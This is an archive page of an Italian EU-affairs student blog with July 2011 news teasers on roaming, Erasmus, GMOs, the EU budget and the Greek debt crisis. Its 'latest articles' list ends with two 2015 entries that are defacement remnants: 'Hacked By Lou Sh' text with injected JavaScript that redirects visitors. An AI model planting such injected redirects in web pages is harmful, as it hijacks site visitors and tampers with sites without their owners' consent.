EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Luglio 2011
it

L’Unione Europea lancia la nuova campagna anti-fumo denominata “Gli ex fumatori sono irresistibili”. L’obiettivo principale dell’iniziativa punta ad aiutare gli ex fumatori a non ricadere e ai giovani a non cadere nella trappola mortale della sigaretta e del fumo in generale. Sono 16 i milioni di euro stanziati per il primo anno dell’iniziativa che attacca anche le ristrette informazioni sulle “sigarette senza fumo”, gli aromi aggiunti e la pubblicità.

L’UE scende ancora in campo contro il fumo. Davanti alle recenti statistiche di Bruxelles che vedevano circa 650 mila cittadini europei morti ogni anno a causa del fumo attivo e passivo, la Commissione europea non ha potuto più avere dubbi: il fumo andava combattuto ancora più duramente. Notevoli (...)

it

Si è svolto il 24 giugno il vertice tra i leader europei per discutere i piani di azione per una maggiore integrazione dei Rom. Dalla fine del 2011, infatti, i Rom saranno tutelati attraverso provvedimenti specifici e obiettivi prefissati da raggiungere.

Sono circa 10-12 milioni i Rom sparsi in tutta Europa. Il termine generico Rom si riferisce ad una serie di gruppi che si autodefiniscono Rom, Zingari, Viaggiatori, Manouches, Ashkali, Sinti e altro. Si deve sottolineare, però, che con l’utilizzo del termine Rom non si intende denigrare alcuna (...)

it

La strategia per le politiche giovanili 2008-2018 è un progetto approvato alla fine del 2009, dalla collaborazione di tutti gli Stai della Comunità Europea. Conferma, ancora una volta, di come l’Unione intera punti tutto sui giovani.

I primi segni d’interesse da parte degli Stati Membri verso la giovane comunità europea si sono visti già nei primi anni ’90. Infatti, nel trattato di Manchester, del 1993, grazie articolo 149§ 2, i Paesi europei hanno inserito nelle loro azioni politiche anche i giovani e il loro futuro (...)

it

Tra i principali ambiti di discussione all’ordine del giorno: il coordinamento delle politiche economiche con la valutazione semestrale dei programmi nazionali di stabilità e convergenza degli stati membri, l’attuazione del “pacchetto di marzo” consistente in un aumento della efficacia della stabilità finanziaria degli stati membri e la delicata situazione economica in Grecia. Mario Draghi da novembre sarà il nuovo presidente della Banca Centrale Europea.

L’ultimo Consiglio europeo svoltosi a Bruxelles verrà ricordato come uno dei più positivi da qualche anno a questa parte. Infatti il tradizionale incontro tra i capi di stato o di governo dei Paesi membri, previsto con cadenza periodica per esaminare ed eventualmente sbloccare le situazioni sulla (...)

05
07
2011

Roaming meno caro

it

Dal mese di luglio 2011 finalmente sarà possibile effettuare e ricevere telefonate mentre ci troviamo in un altro paese dell' UE senza l'incubo costante di rimanere senza credito durante una conversazione o dopo poche chiamate.

Estate: tempo di vacanze e di valigie, tempo di partire e lasciare a casa pensieri, stress e tutte quelle preoccupazioni che hanno affollato durante l’inverno la nostra testa. Ma a prescindere da quale sarà la nostra meta, con chi partiremo e per quanto tempo saremo lontani da casa c’è (...)

it

Secondo il rapporto annuale Erasmus a.a 2009/2010, la mobilità di studio è aumentata del 7,7% rispetto all’a.a. precedente. Il programma, facente parte del Lifelong Learning programme, ha raggiunto un traguardo inaspettato: ben 19.118 studenti italiani hanno scelto di partecipare al progetto Erasmus, scegliendo di vivere e studiare per un periodo di tempo, più o meno lungo, in un paese straniero.

Il progetto Erasmus, acronimo di European Region Action Scheme for the Mobility of University Students, nasce nel 1987 ad opera della Comunità Europea. Il progetto nasce con l’intento di dare la possibilità, ad uno studente universitario europeo, di studiare in una università straniera o effettuare (...)

it

Comunicare è alla base della nostra società. Il web come mezzo di comunicazione è uno strumento ormai utilizzato quasi da tutti. Anche l’UE sembra aver trovato il perfetto connubio fra questi due elementi. E’ stato lanciato proprio in questi giorni infatti il nuovo canale web dell’ANSA interamente (...)

it

Domenica scorsa si è verificata una nuova manifestazione ai cantieri del supertreno. Giuseppe Petronzi, dirigente della Digos di Torino, chiarisce il senso degli interventi degli agenti nella Val di Susa durante la manifestazione. “Ci stiamo occupando di un gruppo di 300 persone che si sono comportate in maniera violenta. Preciso che non stiamo parlando di appartenenti al Movimento No Tav ma di quelli che possiamo definire Black Block”.

I disordini sono cominciati a mezzogiorno di domenica per poi concludersi sei ore dopo. Tantissimo il materiale sequestrato nei boschi, in particolare nell’area di Ramat, laddove si sono concentrati gli scontri: estintori, molotov preparate con bottiglie di birra, maschere antigas, contenitori (...)

it

L’unione Europea, dopo essersi preparata, ha accettato il cambio di presidenza semestrale. Per la prima volta la direzione del Consiglio è stata affidata al più dinamico e stabile paese dell’Ue: la Polonia. Donald Tusk, governatore centrista della Polonia dal 2007, si dice fiducioso e ottimista per i mesi a venire.

Questo è uno dei semestri più attesi, il secondo consecutivo dopo la presidenza di uno dei paesi dell’ex blocco sovietico, l’Ungheria. Donald Tusk ha sottolineato che il semestre di presidenza polacca coincide con un periodo particolarmente difficile per l’Ue, dato dalla crisi finanziaria (...)

it

Scaricate il giornale radio con le notizie dall’Europa all’indirizzo: http://radio.torvergata.it/multimed...

Apriamo il nostro €urogiornale con una buona notizia che arriva da Bruxelles. Si tratta di una decisione importante relativa ai costi del roaming della telefonia mobile. E’ stato abbassato il tetto massimo per le telefonate all’interno dei paesi dell’UE: 35 centesimi al minuto e non più 39 per (...)

it

La commissione europea così con una conferenza stampa nella tarda serata del 29 giugno 2011 ha varato la sua proposta sulle nuove prospettive economiche che influiranno sul bilancio finanziario europeo tra il 2014 e il 2020. Definita da Josè Manuel Barroso, presidente dell’Esecutivo comunitario, e da Janusz Lewandowski, commissario al bilancio, “ambiziosa ma realistica” la proposta prevede un bilancio pari a 1025 miliardi di euro in impegni e di 972,2 miliardi di euro in pagamenti nell’arco dei sette anni.

A Bruxelles per l’Unione Europea è giunta l’ora di guardare al futuro. A conferma di ciò la Commissione europea annuncia la sua proposta per il bilancio economico 2014-2020. Il flusso delle entrate sarà l’1,05% dell’intero Pil dei 27 mentre il flusso dei pagamenti sarà l’1% del Pil stesso. La proposta (...)

it

Napoli corre ai ripari: il nuovo sindaco Luigi de Magistris ha sottoscritto un impegno per un aumento di capitale dell’Asia, società che si occupa dello smaltimento dei rifiuti nel capoluogo partenopeo.

Il tempo della tolleranza sta per scadere. L’UE infatti mette alle strette l’Italia, con un ultimo avvertimento sull’emergenza rifiuti, che con il passare degli anni ormai sta assumendo i contorni di una vera e propria piaga per tutta la regione Campania. Il nuovo monito arriva dal Commissario (...)

it

L’Unione Europea dichiarava infatti il ritiro dei fondi europei se l’impegno dell’inizio dei lavori non fosse stao rispettato entro il 30 giugno, insieme alla firma di un accordo internazionale e all’approvazione del progetto.

La risposta del governo è arrivata dal ministro del’Interno Roberto Maroni: "Entro il 30 giugno il cantiere sarà aperto, nonostante le polemiche infinite, perché sarebbe un delitto per le giovani generazioni". Ma per quella data, ovvero in meno di sei giorni, L’Unione voleva i fatti, ovvero (...)

12
07
2011

Risveglio Europeo

it

Dopo giorni e giorni di manifestazioni e di occupazioni gli Indignados Spagnoli hanno fatto valere le proprie richieste e il governo non ha potuto fare a meno di ascoltarli attuando nuove manovre e decreti che andranno ad agevolare e migliorare il malessere ostentato dal popolo Spagnolo.

Persistenza, ostinazione, passione, rabbia sono state di sicuro le carte vincenti degli Indignados. Lo scorso aprile erano scesi in piazza per protestare il governo, la corruzione delle classi politiche e la collusione con le banche tutto ciò che rischiava di soffocarli, che rischiava di (...)

it

L’Unione Europea ha indetto corsi di formazione per dirigenti europei in Giappone e Corea. L’inizio dei corsi è previsto per la fine del 2012; lo scopo è quello di allargare il mercato europeo fino al continente giallo.

Partiranno nel novembre 2012 i corsi di formazione in Giappone e Corea, che l’Unione mette a disposizione per dirigenti europei, che avranno la possibilità di allargare l’orizzonte del mercato europeo. Il corso, che durerà un anno, sarà diviso in due fasi, la prima si svolgerà in Europea, l’altra (...)

it

Come sempre l'Unione Europea rivolge ai giovani un'attenzione particolare per quanto riguarda il loro futuro e si pone come obiettivo quello di aiutarli a realizzare i lori progetti.

Da sempre uno degli obiettivi fondamentali dell’UE è quello di occuparsi dei giovani, del loro futuro. Abbiamo pubblicato in questi mesi bandi di concorso per aspiranti fotografi, giornalisti, scrittori. Attraverso questi progetti viene offerta ai giovani la possibilità di mettersi in gioco, di (...)

14
07
2011

Ogm si Ogm no

it

Nella votazione che martedì scorso ha visto il Parlamento Europeo dare l’ok alla decisione di delegare il diritto di divieto degli Ogm ai singoli Paesi, ci sono stati 548 voti per il si, 31 astenuti e 84 contrari. Numeri che dimostrano quanto sia stata apprezzata la proposta della francese liberale Corinne Lepage, che ha chiesto carta bianca sugli Ogm per tutti i Paesi comunitari per motivi agro-ambientali, come “la resistenza ai pesticidi, l'invasività di certe colture e la minaccia alla biodiversità”.

Se il Consiglio UE dell’ambiente approverà a maggioranza qualificata il testo, i divieti nazionali di coltura di Organismi geneticamente modificati autorizzati saranno possibili sulla base di motivazioni ambientali (“come lo sviluppo di erbe infestanti resistenti agli erbicidi e la protezione (...)

it

Nuova tirata d'orecchie nei confronti dell'AGCOM al quale la Commissione richiede più collaborazione per quanto riguarda il campo delle telecomunicazioni: necessario l'abbassamento delle tariffe di telefonia mobile e una maggiore flessibilità per concretizzare l'obiettivo comune: la realizzazione di unico mercato digitale europeo.

Nell’articolo pubblicato il 07 luglio ci siamo occupati della questione relativa alle decisioni dell’UE per quanto riguarda i costi del roaming della telefonia mobile. Nuove notizie arrivano da Bruxelles: questa volta protagonista è l’Italia. Proprio in questi giorni l’AGCOM ( autorità ufficiale (...)

it

Cari lettori e ascoltatori, a voi il link per scaricare il file mp3 dell'€urogiornale http://radio.torvergata.it/multimed... Scusandoci per il disagio causato a inizio di settimana, ringraziamo come sempre Radio Tor Vergata per la preziosa collaborazione. Buon ascolto e buona lettura!

L’UE delega il divieto degli Ogm ai singoli Stati Questa è la posizione presa dalla maggioranza del Parlamento Europeo sulla relazione della liberale francese Corinne Lepage. 548 i voti a favore, 31 astensioni e 84 voti contrari. La proposta, che ora dovrà passare all’esame del Consiglio UE, (...)

it

Finanziato dalla Commissione Europea, il Programma si prefigge lo scopo di potenziare il numero e le competenze del personale di ricerca e sviluppo tecnologico in Europa. I destinatari sono i Ricercatori sia in fase iniziale, sia in fase avanzata. Le tematiche di ricerca sono numerose: Chimica, Scienze Umane e Sociali, Scienze Informatiche, Ingegneria, Ambiente e Scienze della Terra, Salute, Matematica e Fisica.

Le Azioni Marie Curie sono inserite nell’ambito dello Spazio Europeo della Ricerca (SER), strumento essenziale per migliorare le capacità dell’Europa di attrarre nuove risorse e per incrementare il suo sviluppo, l’attrattività e le capacità europee. I ricercatori svolgono un ruolo essenziale nel (...)

it

Dall'Unione Europea giunge voce di voler raggiungere un accordo globale per la riduzione delle emissioni di gas prodotte dalle navi che con gli anni andrebbero ad aumentare del 30% causando cambiamenti climatici oltre che inquinamento ambientale.

Dopo il progetto Green Emotion, avviato dall’Ue per ridurre l’inquinamento ambientale cercando di eliminare l’emissione di CO2, oggi la Commissione Europea torna di nuovo sul tema dell’inquinamento atmosferico causato dai mezzi di trasporto. In particolare ci si sofferma sulle emissioni di carbonio (...)

it

Gioventù in Azione è un programma di azione comunitaria, ideato dalla Commissione Europea, che nasce appositamente per favorire lo sviluppo delle organizzazioni giovanili, della società civile e degli animatori giovanili. L’UE, dal 2007 al 2013, si sta impegnando nel finanziare questo progetto, soprattutto perché convinta della sua validità e del fatto che si avverte sempre più bisogno di investire sui giovani, che sono il futuro non solo dell’Europa, ma del mondo.

Su questa base, il progetto di formazione e networking è coordinato per promuovere la cittadinanza attiva dei giovani e, in generale, la loro cittadinanza europea; sviluppare la solidarietà e la coesione tra i giovani dell’UE; favorire la comprensione reciproca tra i giovani di paesi diversi; (...)

it

"La nuova direttiva, volta a combattere l'abuso e lo sfruttamento sessuale dei bambini e la pornografia infantile è uno strumento legislativo innovativo e rappresenta un passo avanti per la tutela dei nostri figli. Il testo sarà a disposizione delle autorità competenti e delle ONG, in modo che ci sia tolleranza zero contro tutti i crimini contro i bambini", ha dichiarato Roberta Angelilli, una dei 14 vicepresidenti del Parlamento Europeo.

Si tratta di guerra tra l’Unione Europea e la pedopornografia. Infatti chi abusa di un bambino o frequenta abitualmente siti pedopornografici si troverà ad affrontare dure sanzioni per i reati di abuso e sfruttamento della pornografia infantile. Sulla base di un progetto di legge concordato con i (...)

it

Scaricate il file mp3 della nuova puntata di luglio del nostro radiogiornale sull'attualità europea http://radio.torvergata.it/multimed...

Vivaci proteste da parte del parlamento greco contro la scelta dell’agenzia di rating finanziario Fitch. La società vuole procedere al declassamento dei titoli di stato locali, retrocessi ora in classe CCC cioè ben quattro livelli in meno rispetto al precedente rating. Il ministro della Finanza (...)

it

Dopo le previsioni negative sulla valutazione dei titoli di Grecia e Portogallo, l'agenzia internazionale di rating Moody's ha tagliato di un gradino anche il rating dell'Irlanda definendolo «junk», spazzatura, portandolo da Ba1 da Ba3.

Moody’s ritiene che “c’è una crescente possibilità” che l’Irlanda abbia bisogno di nuovi aiuti finanziari prima di poter tornare sul mercato privato, quando il programma di aiuti dell’Unione Europea e del Fondo Monetario Internazionale sarà concluso. «Le prospettive restano negative», si legge in una (...)

it

I titoli di stato greci hanno subito un declassamento di ben quattro categorie, giustificato da Fitch come dovuto alla mancanza di un nuovo programma di sostegno. L’Italia invece mantiene il rating di prima classe.

La Grecia non ispira fiducia, almeno nel campo del rating economico dei titoli di stato. Fitch infatti, grossa agenzia del settore assieme a Moody’s e Standard&Poor’s, ha annunciato il declassamento dei bond nazionali greci, retrocessi così dalla categoria B+ alla più bassa, la CCC. Una caduta (...)

it

"Un mare senza pesci è un mare morto" questo è lo slogan proposto dal WWF e che possiamo trovare da qualche giorno sul loro sito ufficiale. Sono stati infatti pubblicati i punti per la petizione che in questi giorni il WWF sta facendo circolare in rete e che presto sarà presentata all'UE per la salvaguardia di tutte le specie marine e per la tutela del nostro mare.

A chi non è capitato guardando il mare di pensare ad un qualcosa di infinito, di illimitato, chi non ha provato una sensazione di assoluta perfezione? Eppure ciò è quanto di più errato l’uomo possa aver pensato nel corso dei secoli. E’ sbagliato infatti pensare al nostro mare come un bene infinito (...)

it

La commissione europea ha approvato i certificati verdi della Romania. Così, l’obiettivo europeo che auspica per il 2020 di raggiungere il 20% della produzione di energia da fonti rinnovabili sembra fare un passo in avanti.

Per certificati verdi s’intendono dei titoli negoziabili che vengono concessi a imprese che producono una certa quantità di energia elettrica generata da fonti rinnovabili. Ogni Paese europeo gestisce la concessione dei certificati in modo diverso, uguale per tutti, però, è la clausola, secondo la (...)

it

Sono state diffuse da Bruxelles da pochi giorni e già sono state definite come le norme più severe a livello mondiale per quanto riguarda una più sicura produzione di giocattoli.

Lo scorso settembre aveva scosso tutti la notizia della bambina di 10 mesi morta per soffocamento dopo aver ingerito una componente troppo piccola di un giocattolo. Purtroppo non si tratta del primo caso di morte di un bambino a causa di giocattoli che si rivelano essere pericolosi, dannosi e (...)

it

Ricerca, istruzione, innovazione. Questi i termini con cui l’UE definisce il “triangolo della conoscenza”: tutto basato sugli sforzi europei per raggiungere gli obiettivi di Lisbona. 4 gli obiettivi del 7PQ: Cooperazione, Idee, Persone e Capacità. Per ogni obiettivo c’è un programma specifico corrispondente alle principali aree di operazione dell’Ue. Tutti i programmi lavorano per raggiungere, comunque, l’eccellenza scientifica in Europa.

Per rendere attivo e competitivo tutto ciò, il 20 luglio 2011 Maire Geoghegan-Quin, Commissaria per la ricerca, l’innovazione e la scienza della Commissione Europea ha annunciato la pubblicazione di alcuni dei 53 bandi per la ricerca e l’innovazione nell’ambito del Settimo Programma Quadro (7PQ), (...)

it

La notizia è confermata già dall’11 marzo scorso: con la pubblicazione in Gazzetta Ufficiale dell’Unione Europea del regolamento n.211/2011, è effettiva la possibilità per i cittadini di presentare proposte per l’adozione di atti giuridici europei direttamente alla Commissione Europea. E’ quanto prevede il Trattato di Lisbona (1° dicembre 2009): i cittadini possono avere diritto di iniziativa popolare. Come richiesto dal Trattato, su proposta della Commissione, il Parlamento Europeo e il Consiglio hanno adottato un regolamento che definisce le norme e le procedure che disciplinano questo nuovo strumento.

L’iniziativa è stata denominata “European Citizens’ Iniziative” (ECI). In vigore dal 1° aprile 2012, viene definito da molti come lo strumento che segna un nuovo traguardo nella storia della democrazia partecipatoria in Europa. Strumento senza precedenti, la ECI mira a coinvolgere direttamente tutti (...)

it

Un vero e proprio Piano Marshall da 160 miliardi di euro definito come una "soluzione eccezionale”, un mix di misure per salvare la Grecia ed evitare il rischio contagio ad altri Paesi della crisi del debito sovrano. Il documento uscito dal vertice è basato in gran parte sull'intesa raggiunta nella notte tra Merkel e Sarkozy.

Il Piano 1) Secondo piano di aiuti: oltre al prestito di 110 miliardi di euro, concesso nel 2010 da Ue e Fmi, è previsto un nuovo piano di aiuti per 109 miliardi di euro. 2) Tre opzioni per l’azione del settore privato: anche il settore bancario parteciperà agli sforzi di salvataggio su base (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France